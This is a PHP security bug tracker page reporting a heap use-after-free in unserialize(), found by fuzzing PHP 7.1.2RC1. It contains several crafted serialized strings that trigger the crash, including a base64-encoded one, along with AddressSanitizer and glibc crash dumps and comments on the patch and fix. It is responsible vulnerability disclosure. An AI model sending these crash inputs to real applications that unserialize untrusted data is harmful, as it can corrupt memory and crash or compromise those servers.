php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #74101 Unserialize Heap Use-After-Free (READ: 1) in zval_get_type
Submitted: 2017-02-15 10:53 UTC Modified: 2017-07-04 18:52 UTC
From: cyoung at tripwire dot com Assigned: ab
Status: Closed Package: *Data Exchange functions
PHP Version: 7.1.2RC1 OS: Linux (4.4.0-59-generic)
Private report: No CVE-ID:
 [2017-02-15 10:53 UTC] cyoung at tripwire dot com
Description:
------------
Using AFL + ASAN, I have uncovered a UAF read bug in unserialize within zval_get_type().

Apologies for the long test input, but minimizing it with AFL leads to a generic out of mem type condition.

Test script:
---------------
USE_ZEND_ALLOC=0 php -r 'unserialize("O:9:\"Exception\":799999999999999999999999999999999997:{i:0;a:0:{}i:6095700000000000000000062;i:1;i:0;R:2;i:0000000000000000000000000000000000000000000000000000000;R:2;i:10;a:0:{}i:62;i:1;i:0;R:2;i:000000000000000000000000000000000000002;d:031830001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:333000000000000000333333000000000101437080;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000009190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000001437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+000030200000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014378809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.000000000000000033307005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:33;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.00000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:33000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517003E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.000000000000000033333300000000010143703330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:33;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000703333317005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000S00000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0080302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:33;d:3");'

Expected result:
----------------
Some errors should probably be printed about the unserialize data being invalid.

Actual result:
--------------
Without ASAN and with USE_ZEND_ALLOC=0, this is a segfault.
With ASAN and USE_ZEND_ALLOC=0, I get this report:
==15662==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200000e548 at pc 0x000001346ae7 bp 0x7fff688a4a50 sp 0x7fff688a4a48
READ of size 1 at 0x61200000e548 thread T0
    #0 0x1346ae6 in zval_get_type /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332:9
    #1 0x1346ae6 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:637
    #2 0x13481ca in process_nested_data /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:452:8
    #3 0x13481ca in object_common2 /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:556
    #4 0x1345f03 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:989:9
    #5 0x133e3ba in php_var_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:584:11
    #6 0x130145e in zif_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var.c:1114:7
    #7 0x1831ce2 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:675:2
    #8 0x16eeff5 in execute_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:432:7
    #9 0x16efda6 in zend_execute /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:474:2
    #10 0x15519cd in zend_eval_stringl /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1093:4
    #11 0x1552343 in zend_eval_stringl_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1134:11
    #12 0x1552343 in zend_eval_string_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1145
    #13 0x193b0aa in do_cli /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1024:8
    #14 0x1938dd4 in main /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1381:18
    #15 0x7f3c83e0482f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #16 0x4809c8 in _start (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x4809c8)

0x61200000e548 is located 264 bytes inside of 288-byte region [0x61200000e440,0x61200000e560)
freed by thread T0 here:
    #0 0x5076b2 in free (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x5076b2)
    #1 0x14af197 in _efree /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2428:4

previously allocated by thread T0 here:
    #0 0x507992 in __interceptor_malloc (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x507992)
    #1 0x14b03ca in __zend_malloc /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2820:14

SUMMARY: AddressSanitizer: heap-use-after-free /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332 zval_get_type
Shadow bytes around the buggy address:
  0x0c247fff9c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9c80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c247fff9c90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c247fff9ca0: fd fd fd fd fd fd fd fd fd[fd]fd fd fa fa fa fa
  0x0c247fff9cb0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff9cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff9cd0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c247fff9ce0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff9cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15662==ABORTING

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-02-15 18:50 UTC] cyoung at tripwire dot com
It looks like this can also be reproduced with a much more concise test case:
O:9:"Exception":799999999999999999999999999997:0i:0;a:0:{}i:2;i:0;i:0;R:2;

Also worth mentioning is that UBSAN produces this interesting line while processing the input:
ext/standard/var_unserializer.re:345:20: runtime error: signed integer overflow: 7999999999999999999 * 10 cannot be represented in type 'long'
 [2017-02-15 20:03 UTC] cyoung at tripwire dot com
Another example of triggering this (or at least a similar) crash slightly differently and without instrumented builds of PHP (but still with USE_ZEND_ALLOC=0):
cyoung@Tyrell:~/unserialize/crash_analysis/out$ ~/php/php-src-php-7.1.2RC1/sapi/cli/php  -r 'var_dump(unserialize(base64_decode("Tzo5OiJFeGNlcHRpb24iOjc5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5Nzp7aTowO2E6MDp7fWk6NjA7ZDozMDAwMDAwMDAwNjE3MDAyOTU3OUUtMTE4O2k6MjtkOjAwMDMxO2k6MjtkOis5NTcxMzMzMzAwMEUtMDAwMDM1ODtpOjI7ZDo0OTU3MTExRS0wMDAwMzE4O2k6MDYyO2k6MTtpOjA7UjoyO2k6")));'
bool(false)
*** Error in `/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php': munmap_chunk(): invalid pointer: 0x000000000235e350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fb0035d97e5]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x1a8)[0x7fb0035e5ae8]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(php_request_shutdown+0x23f)[0x6ac22f]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x7b5dec]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x42b50c]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fb003582830]
/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(_start+0x29)[0x42b649]
======= Memory map: ========
00400000-00c70000 r-xp 00000000 fc:02 1837275                            /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php
00e6f000-00ef4000 r--p 0086f000 fc:02 1837275                            /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php
00ef4000-00f09000 rw-p 008f4000 fc:02 1837275                            /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php
00f09000-00f27000 rw-p 00000000 00:00 0
02227000-02370000 rw-p 00000000 00:00 0                                  [heap]
7fb000d43000-7fb000d59000 r-xp 00000000 fc:00 549                        /lib/x86_64-linux-gnu/libgcc_s.so.1
7fb000d59000-7fb000f58000 ---p 00016000 fc:00 549                        /lib/x86_64-linux-gnu/libgcc_s.so.1
7fb000f58000-7fb000f59000 rw-p 00015000 fc:00 549                        /lib/x86_64-linux-gnu/libgcc_s.so.1
7fb000f59000-7fb0010cb000 r-xp 00000000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0010cb000-7fb0012cb000 ---p 00172000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0012cb000-7fb0012d5000 r--p 00172000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0012d5000-7fb0012d7000 rw-p 0017c000 fc:00 4962                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7fb0012d7000-7fb0012db000 rw-p 00000000 00:00 0
7fb0012db000-7fb002b91000 r-xp 00000000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002b91000-7fb002d90000 ---p 018b6000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002d90000-7fb002d91000 r--p 018b5000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002d91000-7fb002d92000 rw-p 018b6000 fc:00 21478                      /usr/lib/x86_64-linux-gnu/libicudata.so.55.1
7fb002d92000-7fb002db3000 r-xp 00000000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002db3000-7fb002fb2000 ---p 00021000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002fb2000-7fb002fb3000 r--p 00020000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002fb3000-7fb002fb4000 rw-p 00021000 fc:00 563                        /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fb002fb4000-7fb002fcd000 r-xp 00000000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb002fcd000-7fb0031cc000 ---p 00019000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb0031cc000-7fb0031cd000 r--p 00018000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb0031cd000-7fb0031ce000 rw-p 00019000 fc:00 646                        /lib/x86_64-linux-gnu/libz.so.1.2.8
7fb0031ce000-7fb00334d000 r-xp 00000000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00334d000-7fb00354d000 ---p 0017f000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00354d000-7fb00355d000 r--p 0017f000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00355d000-7fb00355e000 rw-p 0018f000 fc:00 21474                      /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1
7fb00355e000-7fb003562000 rw-p 00000000 00:00 0
7fb003562000-7fb003721000 r-xp 00000000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003721000-7fb003921000 ---p 001bf000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003921000-7fb003925000 r--p 001bf000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003925000-7fb003927000 rw-p 001c3000 fc:00 25684                      /lib/x86_64-linux-gnu/libc-2.23.so
7fb003927000-7fb00392b000 rw-p 00000000 00:00 0
7fb00392b000-7fb003ada000 r-xp 00000000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003ada000-7fb003cda000 ---p 001af000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003cda000-7fb003ce2000 r--p 001af000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003ce2000-7fb003ce4000 rw-p 001b7000 fc:00 21488                      /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3
7fb003ce4000-7fb003ce5000 rw-p 00000000 00:00 0
7fb003ce5000-7fb003ce8000 r-xp 00000000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ce8000-7fb003ee7000 ---p 00003000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ee7000-7fb003ee8000 r--p 00002000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ee8000-7fb003ee9000 rw-p 00003000 fc:00 25683                      /lib/x86_64-linux-gnu/libdl-2.23.so
7fb003ee9000-7fb003ff1000 r-xp 00000000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb003ff1000-7fb0041f0000 ---p 00108000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb0041f0000-7fb0041f1000 r--p 00107000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb0041f1000-7fb0041f2000 rw-p 00108000 fc:00 25691                      /lib/x86_64-linux-gnu/libm-2.23.so
7fb0041f2000-7fb004209000 r-xp 00000000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb004209000-7fb004409000 ---p 00017000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb004409000-7fb00440a000 r--p 00017000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb00440a000-7fb00440b000 rw-p 00018000 fc:00 89638                      /lib/x86_64-linux-gnu/libresolv-2.23.so
7fb00440b000-7fb00440d000 rw-p 00000000 00:00 0
7fb00440d000-7fb004433000 r-xp 00000000 fc:00 25673                      /lib/x86_64-linux-gnu/ld-2.23.so
7fb004504000-7fb0045c9000 rw-p 00000000 00:00 0
7fb0045c9000-7fb004617000 r--p 00000000 fc:00 522423                     /usr/lib/locale/sd_IN@devanagari/LC_CTYPE
7fb004617000-7fb00461f000 rw-p 00000000 00:00 0
7fb004628000-7fb004629000 rw-p 00000000 00:00 0
7fb004629000-7fb004630000 r--s 00000000 fc:00 25518                      /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
7fb004630000-7fb004632000 rw-p 00000000 00:00 0
7fb004632000-7fb004633000 r--p 00025000 fc:00 25673                      /lib/x86_64-linux-gnu/ld-2.23.so
7fb004633000-7fb004634000 rw-p 00026000 fc:00 25673                      /lib/x86_64-linux-gnu/ld-2.23.so
7fb004634000-7fb004635000 rw-p 00000000 00:00 0
7ffcbdd36000-7ffcbdd57000 rw-p 00000000 00:00 0                          [stack]
7ffcbddf8000-7ffcbddfa000 r--p 00000000 00:00 0                          [vvar]
7ffcbddfa000-7ffcbddfc000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted
 [2017-05-25 01:49 UTC] cyoung at tripwire dot com
Has anyone looked at this?  It is past the 90 mark and there are no comments on this bug except for my own.  A use-after-free accessible during unserialize() seems serious.
 [2017-06-25 19:01 UTC] nikic@php.net
-Assigned To: +Assigned To: ab
 [2017-06-25 19:01 UTC] nikic@php.net
Patch for this and the similar bug #74614: https://gist.github.com/nikic/2a3deba4e2f1e2f912a36f904160ca51

This is PHP 7 only, so assigning to ab for the release management.
 [2017-07-04 18:52 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2017-07-04 18:52 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Mon Jul 24 10:01:45 2017 UTC